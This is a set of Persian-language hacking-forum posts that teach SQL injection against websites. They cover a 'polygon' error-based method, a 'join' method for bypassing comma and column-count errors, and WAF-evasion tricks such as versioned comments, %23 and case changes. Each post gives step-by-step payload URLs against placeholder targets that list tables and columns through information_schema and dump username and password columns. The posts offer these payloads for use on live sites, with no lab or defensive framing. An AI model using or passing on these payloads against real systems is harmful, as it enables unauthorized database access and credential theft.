  22. با سلام خدمت کاربران و مدیران انجمن گارد ایران من MR.MSA در این پست قصد دارم متد polygon رو به شما آموزش بدهم . ------------------------------------ یکی از کاربرد های متد polygon زمانی است که :‌ در یک تارگت order+by و ... را زدید و تعداد تیبل ها را بدست اوردید و بعد خواستید تیبل ها را بیرون بکشید و با خطای error different number of columns مواجه شدید می توانید از متد polygon استفاده کنید . یکی دیگر از کاربرد های متد polygon زمانی است که :‌ با خطای Unknown column “language’ in ‘field list’ مواجه می شوید می توانید از متد polygon استفاده کنید . ------------------------------------ سطح متد : حرفه ای ------------------------------------ روش استفاده از متد polygon :‌ ابتدا مقدار را پاک کنید : site.com/news.php?id=1 ( نکته : در سایت های که مثلا دو مقدار است آن مقدار را پاک می کنید که اسیب پذیر است و بعد مراحل را پیش می روید . ) -------------- سپس این عبارت را قرار می دهید : http://site.com/news.php/id=polygon((select*from(select*from(select@@version)f)x)) و اگر ورژن را به شما نمایش داد یعنی می توانید از متد polygon استفاده کنید . یک جورایی میشه گفت جای که version است ستون آسیب پذیره. -------------- خب حالا می رویم سراغ بیرون کشیدن تیبل ها : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(table_name) from information_schema.tables where table_schema=database())f)x)) قسمت های بنفش قسمت هایی هستند که تازه اضافه شده اند . توجه داشته باشید که به دلایلی دو (( آخر دستور در جاهای دیگر قرار گرفته اند اما در نگاه به این شکل است ولی زمانی که شما این دستور را کپی کنید و به url تارگت اضافه کنید درست نمایش داده می شود . ( در تمامی دستورات به همین شکل است ،‌ پس نگران نباشید 😁) -------------- (برای مثال تیبل مهمی که بدست می آوریم user است ) و حالا برای بیرون کشیدن ستون های یک جدول : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(column_name)+from+information_schema.columns+where+table_name=’user’)f)x)) قسمت های بنفش قسمت های جدید هستند و باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . -------------- و می مونه بیرون کشیدن اطلاعات ستون های مهم : site.com.news.php/id=polygon((select*from(select*from(select@@group_concat(user,0x3a,pass) from ‘user’)f)x)) باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) و به جای user و pass نام ستون مهم خود را بنویسید . اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . ------------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد polygon یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم . هر گونه سوال در مورد پست داشتید در قسمت سوال و جواب بپرسید . ************ MR.MSA ************* < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
  23. MR.MSA

    متد join در sql injection

    با سلام خدمت شما کاربران عزیز انجمن گارد ایران در این پست می خواهم متد join رو در باگ sql injection به شما آموزش بدهم . ------------------------ موارد قابل استفاده : ۱- مواجه شدن با خطا زمان استفاده از union select ۲- مواجه شدن با خطای : 'Unknown column ‘activo’ in ‘field list ۳- زمانی که سایت به عدد حساس است . ۴- و.... ------------------------ نکته :‌ در بیشتر سایت هایی که از متد join استفاده می شود سایت به + و یا به فاصله حساس است و شما به جای فاصله باید از /**/ استفاده کنید که من برای راحتی شما عزیزان فایلی را قرار دادم که در متد join به جای فاصله ها از /**/ استفاده شده . ------------------------ نحوه استفاده از متد join :‌ ---------------------------------------- ( برای مثال تعداد تیبل های سایت ۵ تا می باشد. ) مرحله اول بیرون کشیدن ستون آسیب پذیر :‌ +union+select+*from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e%23+ و همینطور تا اخر یعنی a و b و c باید کنار ( مقدار select ) قرار داشته باشند و مثلا ۱ می شود a و ۲ می شود b و به همین صورت و بین هر کدام یک join زمانی که به اخر رسدید دیگه join نمی خواهد و اینکه در اول باید بنویسید : from * توجه داشته باشید که هر عدد تبدیل شده است به یک سلکت (مقدار عدد ) ، یک حرف و join ---------------------------------------- ( برای مثال در خروجی ستون ۲ را نشان می دهد و ستون ۲ آسیب پذیر است. ) مرحله دوم بدست آوردن ورژن : +union+select+*from (select 1)a+join+(select version())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ---------------------------------------- مرحله سوم بیرون کشیدن جدول (table) های دیتابیس (و محدود سازی تیبل ها برای نشان ندادن تیبل های سیستمی ) : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ توجه داشته باشید در بیشتر سایت ها سایت به , حساس است به همین دلیل ما از متد separator برای مرتب سازی تیبل ها و تگ <br> استفاده کردیم و شما در صورت لزوم می توانید آن بخش هایی که بکگراند سفید دارند را حذف کنید . ---------------------------------------- ( برای مثال در بین تیبل ها تیبل msa_users وجود دارد . ) مرحله چهارم بیرون کشیدن ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(column_name)+from+information_schema.columns+where+table_name+like+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و می توانید برای مرتب سازی ستون ها از متد separator مانند مرحله سوم استفاده کنید . ما از متد like هم استفاده کردیم و اینکه توجه داشته باشید که بیشتر مراحل مثل یونیم بیس هست . ---------------------------------------- ( برای مثال در خروجی ستون های user و pass مهم است . ) مرحله پنجم بیرون کشیدن اطلاعات در ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(user using ascii)+from+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و به جای user نام ستون مهم خود را بنویسید. می توانید برای مرتب سازی یوزرنیم ها از متد separator مانند مرحله سوم استفاده کنید. و اینکه این یک بار برای یوزرنیم بود و برای پسورد به جای user می نویسید pass ( نام ستون مهم که مربوط به pass است ) ---------------------------------------- امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد join یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم منتظر کامنت های شما هستم . هر گونه سوال در مورد پست داشتید بپرسید . ********* MR.MSA ********** Join method in sql injection.txt
  24. سلام دوستان امروز میخوایم با متد های جالب و بایپس ارور ها در sql injection کار کنیم اول اینکه ما فرض رو بر این میگیرم که شما sqli رو کامل بلدید و فقط نمیتونید بعضی جاهایی که ادمین سایت برای امنیت یه سد هایی رو سر راه ما گزاشته رو بایپس کنیم میریم سراغ آموزش بعد از اینکه ' رو گزاشتیم و صفحه مثل بار اول لود نشد(حالا هرطور دیگه ای.ارور sql .ریدایرکت شدن و...) اولین جایی که ممکنه تو sqli گیر بیفتیم زمانیه که میخوایم ستون هارو پیدا کنیم مثلا target.xxx/index.php?view=blog-detail&newsId=8 تارگت ماست حالا ما میخوایم ستون هاشو بدست بیاریم به این صورت http://target.xxx/index.php?view=blog-detail&newsId=8+order+by+9999-- شاید هر عددی هم که بزاریم باز سایت لود بشه پس بایپس میکینم خب برای اینکه این مشکل رو حل کنیم جلوی value یا همون عدد پشت =یه کوتیشن میذاریم و جلوی اون -- یه+ قرار میدیم و میبینیم مشکل به سادگی حل شد حالا ستون هارو بدست اوردیم http://target.xxx/index.php?view=blog-detail&newsId=8'+order+by+9999--+ به این صورت حالا ستون هاشو بدست اوردیم به طور مثال 8 تا بود حالا بعضی وقتا میبینیم که این کارو کردیم اما دیگه حتی با 1 هم لود نمیشه و ارور میده اینجاس کهه باید بجای order از کلمه group استفاده کنیم که دیگه مطمعنن این سری مشکل رفع میشه اما بعضی وقتا مشکل اساسیه و ارور forbidden میده و اصلا چیزی لود نمیکنه اینجاس که دوباره بایپس لازم میشیم اولین کاری که میکنیم اینه که بجای+--newsId=8'+order+by+9999 http://target.xxx/index.php?view=blog-detail&newsId=8+/*!50000order*/+by+9999-- رو تست میکنیم اگه باز هم نشد برای by هم این رو اضافه میکنیم احتمال زیاد حل میشه اگر باز هم نشد بجای -- عبارت %23 قرار میدیم اگر نشد حروف by / order رو بزرگ میکنیم اگه عمل نکرد میرسیم به اخرین راه قبل از کلمه order /**x**/ x میتونه هر حرفی باشه اضافه می کنیم اگر باز هم ارور داد از جلوی order پاک میکنیم و جلوی by میاریمشکه این سری به احتمال 99 درصد جواب میده خب فکر کنم زیاد طولانی شد ادامه جلسه برای هفته بعد تا خسته نشید تشکر یادتون نره